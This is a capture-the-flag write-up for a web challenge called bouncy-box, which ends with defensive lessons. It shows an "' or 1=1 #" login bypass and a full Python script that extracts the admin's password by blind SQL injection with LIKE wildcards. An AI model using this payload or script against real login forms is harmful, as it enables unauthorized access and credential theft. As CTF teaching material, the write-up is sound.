I"<h1 id="problem">Problem</h1>

<p>We’re given a URL to a website.  That’s it, no source files here!</p>

<p>Let’s see if we can hack it!</p>

<h2 id="investigation">Investigation</h2>
<p>So the website is a weird jump-game which when we get a game-over prompts us to login to save our score.</p>

<p>Luckily, this prompt isn’t sanitized so we can quickly SQL-inject our way past it with a classic “<code class="language-plaintext highlighter-rouge">' or 1=1 #</code>”.</p>

<p><img src="/assets/writeup_imgs/bouncybox.png" alt="image of login prompt" /></p>

<p>Past this prompt we see another user interface listing the players, their login privileges and a button saying “get flag”–which then prompts them to login again, except this prompt isn’t susceptible to SQL injection!  From the high score we can determine the username of the website admin “boxy_mcbounce” but we can’t figure out their password!</p>

<p>Luckily, since the first prompt is susceptible to SQL injection, we can utilize the LIKE operator and SQL wildcard character % to determine the admin’s password. It takes a while (about a minute or two) but eventually we get the admin’s password and can access the flag!</p>

<h1 id="solution">Solution</h1>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Blind injection
</span><span class="kn">import</span> <span class="nn">string</span>
<span class="kn">import</span> <span class="nn">requests</span>

<span class="n">pwd</span> <span class="o">=</span> <span class="s">''</span>
<span class="n">url</span> <span class="o">=</span> <span class="s">'https://bouncy-box.chals.damctf.xyz/login'</span>

<span class="n">i</span> <span class="o">=</span> <span class="mi">0</span>
<span class="c1"># string.printable[66] is wildcard %--so stop before getting there.
</span><span class="k">while</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">66</span><span class="p">:</span>
  <span class="n">payload</span> <span class="o">=</span> <span class="sa">f</span><span class="s">"boxy_mcbounce' and password like '</span><span class="si">{</span><span class="n">pwd</span><span class="o">+</span><span class="n">string</span><span class="p">.</span><span class="n">printable</span><span class="p">[</span><span class="n">i</span><span class="p">]</span><span class="si">}</span><span class="s">%' #;"</span>
  <span class="n">jsonData</span> <span class="o">=</span> <span class="p">{</span><span class="s">'username'</span><span class="p">:</span> <span class="n">payload</span><span class="p">,</span> <span class="s">'password'</span><span class="p">:</span> <span class="s">''</span><span class="p">,</span> <span class="s">'score'</span><span class="p">:</span> <span class="mi">0</span><span class="p">}</span>
  <span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="n">post</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">json</span><span class="o">=</span><span class="n">jsonData</span><span class="p">)</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">r</span><span class="p">.</span><span class="n">status_code</span> <span class="o">==</span> <span class="mi">200</span><span class="p">):</span>
    <span class="n">pwd</span> <span class="o">+=</span> <span class="n">string</span><span class="p">.</span><span class="n">printable</span><span class="p">[</span><span class="n">i</span><span class="p">]</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"password so far is "</span><span class="p">,</span> <span class="n">pwd</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span>
    <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span>
  <span class="k">else</span><span class="p">:</span>
    <span class="k">print</span><span class="p">(</span><span class="n">string</span><span class="p">.</span><span class="n">printable</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="s">"failed, status:"</span><span class="p">,</span> <span class="n">r</span><span class="p">.</span><span class="n">status_code</span><span class="p">)</span>
    <span class="n">i</span> <span class="o">+=</span> <span class="mi">1</span>

<span class="k">print</span><span class="p">(</span><span class="n">pwd</span><span class="p">)</span>
</code></pre></div></div>

<h1 id="conclusion--lessons-learned">Conclusion &amp; Lessons Learned:</h1>
<p>A system is only as strong as its weakest link–or something like that.  Remember to sanitize your sql inputs, store passwords as hashes, and don’t reinvent the wheel if you can help it.</p>
:ET